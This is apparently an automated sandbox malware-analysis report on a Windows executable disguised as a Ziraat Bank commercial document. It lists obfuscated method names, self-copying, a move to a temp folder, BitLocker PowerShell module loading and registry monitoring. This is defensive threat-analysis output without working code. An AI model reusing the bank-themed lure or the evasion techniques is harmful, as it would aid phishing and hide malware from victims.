Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, lDLPAgubLZmDc1jo0b.cs High entropy of concatenated method names: 'RCYUhABkfU', 'A8aUywbXM3', 'amsUO4ghM9', 'MZ3U9IYaXU', 'LpUUlOk385', 'IahUkk2g2F', 'rmfVelmx6AAIyvdfc0', 'R69o2XGWK9QnvAx8bM', 'UgmUUDWHAA', 'V7pU8N2rLb'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, nBSBY0USmCp6UlQn8P9.cs High entropy of concatenated method names: 'k2kDiGZAZw', 'hbpDISbqX8', 'g1LD4TSL1M', 'xpPDZDbhfs', 'Ku6DeYEQO9', 'L8vDxE2YXX', 'QrdDBC2qAI', 'AXcD3wYdjH', 'T8GDp5g0Ev', 'e0YDblXu1U'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, RXQHt8MxC3c30aRuOb.cs High entropy of concatenated method names: 'E3hcY95iUr', 'riUcQAmEKh', 'bVpcgyP9Kw', 'Rm4cnIIePQ', 'S79c2cgJxc', 'a4mchSE6XO', 'rVYcyPe0So', 'hSncRlGjNI', 'wogcO1y8Wx', 'VMFc9S8Syr'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, qDqu03FSbprfe5fHqv.cs High entropy of concatenated method names: 'fT3DUt5w8p', 'kHyD8EUV34', 'QQSDu7ctHX', 'VrTDYSG0uE', 'c5ZDQGtVT3', 'RrCDnsAOwt', 'UboD2c71Tf', 'ymEcEvMbhj', 'f4ScMQ6auw', 'qZ0c5VXeAS'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, m3pNODCGVrM93eChwL.cs High entropy of concatenated method names: 'hV2hYMysBI', 'HAZhg9PN01', 'WUuh27bNeb', 'TPa2FmE6pi', 'zSc2zCCrsb', 'IkMhSL1ZCf', 'qNchUI9h0Q', 'PCDhAhj5HB', 'Bm3h8VICtf', 'RSKhuPw1Pk'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, xeQC5ayUf3TpgtdV4u.cs High entropy of concatenated method names: 'V468tBAqUq', 'qLy8YRrpFp', 'LOF8QEn16d', 'Uyq8gne6Bl', 'YVk8nDXwjN', 'rQE82W1ape', 'gAS8hwoSZU', 'AK48yPejpE', 'QMX8RQ1vP6', 'snH8OJKENB'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, faXU0HbFn0VlcvpUOk.cs High entropy of concatenated method names: 'I3wneRjP0w', 'uRJnBHL1Up', 'LyUgJjOSK8', 'sJ9gWJap9d', 'kY1goBhSqc', 'apjgX6W0vA', 'p3NgCqbmSV', 'sUxgvcf6OI', 'AKng7NnK9Z', 'k3FgdffWHU'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, biZFxcfOtcCauKkLje.cs High entropy of concatenated method names: 'XS2ldTqYyn', 'LmnlqAmuwk', 'pl6lfk09Nw', 'vTblrMt0w4', 'Twjl0Ue7oj', 'lUmlJMUirv', 'DbflWyfNA8', 'i2ylos3jTn', 'h2ilXlb4bX', 'OmflCRasDy'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, TT73LD5OHsE90YrMpZ.cs High entropy of concatenated method names: 'YNycHcn2CB', 'IWIc0snEhg', 'yHjcJr5eQ9', 'ceocW5HDm6', 'w0FcfhmMVO', 'VjOcoc7nt8', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, ks342GU8C1HljVtJCjj.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lTO6f6ESnq', 'JlA6rYgC4C', 'ptZ6who8Tv', 'Pm26K2eCYW', 'vTI6PRaVEM', 'Xlv6Vu0la1', 'uH16EYLemr'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, N2NLe9WAC5M2YZ7daw.cs High entropy of concatenated method names: 'Kok2aqovIx', 'U4g2iFPhj7', 'fTu24behCk', 'tRh2ZOom9a', 'bSI2xloAgX', 'yIT2B7D8KE', 'J4L2pQM7UB', 'z9l2bn54el', 'vd80GTLsF0lpImu5SbU', 'qkF1YQLpQn1E6xFWcGT'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, mo84m9QlATiWAUgsJh.cs High entropy of concatenated method names: 'Dispose', 'XCcU5bKnyp', 'jWyA0FmB9J', 'mkURRZApnL', 'OfXUFQHt8x', 'L3cUz30aRu', 'ProcessDialogKey', 'mbKAST73LD', 'lHsAUE90Yr', 'WpZAAcDqu0'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, AaaHTYzxBUD3nMVHpF.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Fe1DmaHn5Z', 'oKeDlrSfrS', 'lKGDkKx1g0', 'jx7DNOG8me', 'gv2DcOHTEh', 'nUrDDmvV2S', 'MoTD65ecEF'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, sVaoHKVfv5Ch2ndaHT.cs High entropy of concatenated method names: 'l5BNM0TPii', 'cpJNFpT9m5', 'NV9cSZ3NOF', 'hTFcUdkCJt', 'xiBNLMZXo5', 'CjZNqgvkHS', 'LFRNG9VQDp', 'UWSNfrF7gJ', 'PPLNrWriah', 'rj6Nw4qilD'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, E85WahHk2g2F6eF9qk.cs High entropy of concatenated method names: 'GDx2tF8QmD', 'tkb2QXXLtt', 'XGn2niIbcs', 'g5I2ht7XX4', 'AeW2ydf91b', 'jB5nPYNy2F', 'CHmnVXFE57', 'JIbnECkbZA', 'QrbnM1wGh7', 'Vp4n5OxkWq'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, mRlBeO0VGrHIxDxtWq.cs High entropy of concatenated method names: 'V1sEHKLuPWfCak5WJAW', 'vhNaQOLnxqIRQTgXF1S', 'KIQ2cyNEiB', 'UDt2DeaDyR', 'pP626OAj29', 'oxCZDBLF14Gm3L26g4F', 'd3UVXNLJKOKLWCKTBYM'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, rOMlg0K8fJ6ULvns4I.cs High entropy of concatenated method names: 'GUyNOuAypo', 'KFTN9sfNuM', 'ToString', 'ScgNYqJ77K', 'bwcNQahg0m', 's7sNg0kXlJ', 'i0BNnPtZdu', 'JrqN2roJcA', 'JCdNhkFrhk', 'Hj9Ny0NRnx'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, fABkfU3Z8awbXM3bZr.cs High entropy of concatenated method names: 'XbyQf6YqD1', 'HOIQrGTJCy', 'tStQwc9pxB', 'VGjQK9oK6g', 'QF6QPc9Aqm', 'PREQVJvZkX', 'ztGQEF1D3a', 'nlVQMc27hA', 'BRmQ5ytT2u', 'eTsQFhblXX'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, aOwyEqwyrju2kXFDoT.cs High entropy of concatenated method names: 'ToString', 'RpEkLK9qWF', 'IjNk0oMMI8', 'Vk4kJfTe5g', 'qPLkWvHuNe', 'IockoeZTwU', 'o7AkXNvs69', 'xXmkCaH8Tx', 'pXJkvceUps', 'z5bk7dpQba'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, qDFOWtG9VuR5pdyc2O.cs High entropy of concatenated method names: 'h9om3XPIBf', 'XlHmpe2i8U', 'SCGmHMs6On', 'T0Ym0UsEtC', 'LpGmW2QLqy', 'bSsmo268mH', 'LURmC7kBjg', 'LjHmv0qQuV', 'MKfmdLMmTe', 'DgEmLJtyS7'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, oZUwic70lEwBnIGtjJ.cs High entropy of concatenated method names: 'OlOhiopZq2', 'YmdhIKa9HC', 'e5fh4xfBA7', 'wrJhZ0ImwD', 'iXgheRr01y', 'RL6hxaGjmw', 'mQuhBeVAGy', 'kvAh3Yvj79', 'cwmhp2uarV', 'ul6hbbxhBq'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, MREV3Spms4ghM97Z3I.cs High entropy of concatenated method names: 'ClvgZwrpfI', 'xdZgxtfJfF', 'Mv3g31pK3Y', 'mMfgp0JTkx', 'GdqglUrcaP', 'mqxgk6yCwF', 'wohgNfWmy6', 'VQfgc4PWXv', 'MHSgDGPK5G', 'iVvg6AsENk'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, if2je5AfxZ9xybvf7q.cs High entropy of concatenated method names: 'Rpw4kmk6R', 'rC3ZgrbpA', 'ArRxbbEiN', 'kWZB2qvv7', 'CNcpPqYFQ', 'DWfbNGeEF', 'T9Hmvux29ao9X06RBZ', 'q57UkcSVnXqZtxWQLR', 'GF8SeptpciuQZyjV8c', 'Easc451Ic'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, lDLPAgubLZmDc1jo0b.cs High entropy of concatenated method names: 'RCYUhABkfU', 'A8aUywbXM3', 'amsUO4ghM9', 'MZ3U9IYaXU', 'LpUUlOk385', 'IahUkk2g2F', 'rmfVelmx6AAIyvdfc0', 'R69o2XGWK9QnvAx8bM', 'UgmUUDWHAA', 'V7pU8N2rLb'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, nBSBY0USmCp6UlQn8P9.cs High entropy of concatenated method names: 'k2kDiGZAZw', 'hbpDISbqX8', 'g1LD4TSL1M', 'xpPDZDbhfs', 'Ku6DeYEQO9', 'L8vDxE2YXX', 'QrdDBC2qAI', 'AXcD3wYdjH', 'T8GDp5g0Ev', 'e0YDblXu1U'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, RXQHt8MxC3c30aRuOb.cs High entropy of concatenated method names: 'E3hcY95iUr', 'riUcQAmEKh', 'bVpcgyP9Kw', 'Rm4cnIIePQ', 'S79c2cgJxc', 'a4mchSE6XO', 'rVYcyPe0So', 'hSncRlGjNI', 'wogcO1y8Wx', 'VMFc9S8Syr'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, qDqu03FSbprfe5fHqv.cs High entropy of concatenated method names: 'fT3DUt5w8p', 'kHyD8EUV34', 'QQSDu7ctHX', 'VrTDYSG0uE', 'c5ZDQGtVT3', 'RrCDnsAOwt', 'UboD2c71Tf', 'ymEcEvMbhj', 'f4ScMQ6auw', 'qZ0c5VXeAS'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, m3pNODCGVrM93eChwL.cs High entropy of concatenated method names: 'hV2hYMysBI', 'HAZhg9PN01', 'WUuh27bNeb', 'TPa2FmE6pi', 'zSc2zCCrsb', 'IkMhSL1ZCf', 'qNchUI9h0Q', 'PCDhAhj5HB', 'Bm3h8VICtf', 'RSKhuPw1Pk'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, xeQC5ayUf3TpgtdV4u.cs High entropy of concatenated method names: 'V468tBAqUq', 'qLy8YRrpFp', 'LOF8QEn16d', 'Uyq8gne6Bl', 'YVk8nDXwjN', 'rQE82W1ape', 'gAS8hwoSZU', 'AK48yPejpE', 'QMX8RQ1vP6', 'snH8OJKENB'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, faXU0HbFn0VlcvpUOk.cs High entropy of concatenated method names: 'I3wneRjP0w', 'uRJnBHL1Up', 'LyUgJjOSK8', 'sJ9gWJap9d', 'kY1goBhSqc', 'apjgX6W0vA', 'p3NgCqbmSV', 'sUxgvcf6OI', 'AKng7NnK9Z', 'k3FgdffWHU'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, biZFxcfOtcCauKkLje.cs High entropy of concatenated method names: 'XS2ldTqYyn', 'LmnlqAmuwk', 'pl6lfk09Nw', 'vTblrMt0w4', 'Twjl0Ue7oj', 'lUmlJMUirv', 'DbflWyfNA8', 'i2ylos3jTn', 'h2ilXlb4bX', 'OmflCRasDy'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, TT73LD5OHsE90YrMpZ.cs High entropy of concatenated method names: 'YNycHcn2CB', 'IWIc0snEhg', 'yHjcJr5eQ9', 'ceocW5HDm6', 'w0FcfhmMVO', 'VjOcoc7nt8', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, ks342GU8C1HljVtJCjj.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lTO6f6ESnq', 'JlA6rYgC4C', 'ptZ6who8Tv', 'Pm26K2eCYW', 'vTI6PRaVEM', 'Xlv6Vu0la1', 'uH16EYLemr'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, N2NLe9WAC5M2YZ7daw.cs High entropy of concatenated method names: 'Kok2aqovIx', 'U4g2iFPhj7', 'fTu24behCk', 'tRh2ZOom9a', 'bSI2xloAgX', 'yIT2B7D8KE', 'J4L2pQM7UB', 'z9l2bn54el', 'vd80GTLsF0lpImu5SbU', 'qkF1YQLpQn1E6xFWcGT'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, mo84m9QlATiWAUgsJh.cs High entropy of concatenated method names: 'Dispose', 'XCcU5bKnyp', 'jWyA0FmB9J', 'mkURRZApnL', 'OfXUFQHt8x', 'L3cUz30aRu', 'ProcessDialogKey', 'mbKAST73LD', 'lHsAUE90Yr', 'WpZAAcDqu0'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, AaaHTYzxBUD3nMVHpF.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Fe1DmaHn5Z', 'oKeDlrSfrS', 'lKGDkKx1g0', 'jx7DNOG8me', 'gv2DcOHTEh', 'nUrDDmvV2S', 'MoTD65ecEF'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, sVaoHKVfv5Ch2ndaHT.cs High entropy of concatenated method names: 'l5BNM0TPii', 'cpJNFpT9m5', 'NV9cSZ3NOF', 'hTFcUdkCJt', 'xiBNLMZXo5', 'CjZNqgvkHS', 'LFRNG9VQDp', 'UWSNfrF7gJ', 'PPLNrWriah', 'rj6Nw4qilD'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, E85WahHk2g2F6eF9qk.cs High entropy of concatenated method names: 'GDx2tF8QmD', 'tkb2QXXLtt', 'XGn2niIbcs', 'g5I2ht7XX4', 'AeW2ydf91b', 'jB5nPYNy2F', 'CHmnVXFE57', 'JIbnECkbZA', 'QrbnM1wGh7', 'Vp4n5OxkWq'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, mRlBeO0VGrHIxDxtWq.cs High entropy of concatenated method names: 'V1sEHKLuPWfCak5WJAW', 'vhNaQOLnxqIRQTgXF1S', 'KIQ2cyNEiB', 'UDt2DeaDyR', 'pP626OAj29', 'oxCZDBLF14Gm3L26g4F', 'd3UVXNLJKOKLWCKTBYM'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, rOMlg0K8fJ6ULvns4I.cs High entropy of concatenated method names: 'GUyNOuAypo', 'KFTN9sfNuM', 'ToString', 'ScgNYqJ77K', 'bwcNQahg0m', 's7sNg0kXlJ', 'i0BNnPtZdu', 'JrqN2roJcA', 'JCdNhkFrhk', 'Hj9Ny0NRnx'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.28edd60.1.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.28e4748.0.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Creates processes with suspicious names
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe File created: \ziraat bankasi_try m#u00fc#u015fteri no_11055699-1034 nolu ticari 26.09.2024.exe
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe File created: \ziraat bankasi_try m#u00fc#u015fteri no_11055699-1034 nolu ticari 26.09.2024.exe
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe File created: \ziraat bankasi_try m#u00fc#u015fteri no_11055699-1034 nolu ticari 26.09.2024.exe Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe File created: \ziraat bankasi_try m#u00fc#u015fteri no_11055699-1034 nolu ticari 26.09.2024.exe Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Moves itself to temp directory
Source: c:\users\user\desktop\ziraat bankasi_try m#u00fc#u015fteri no_11055699-1034 nolu ticari 26.09.2024.exe File moved: C:\Users\user\AppData\Local\Temp\tmpG612.tmp Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
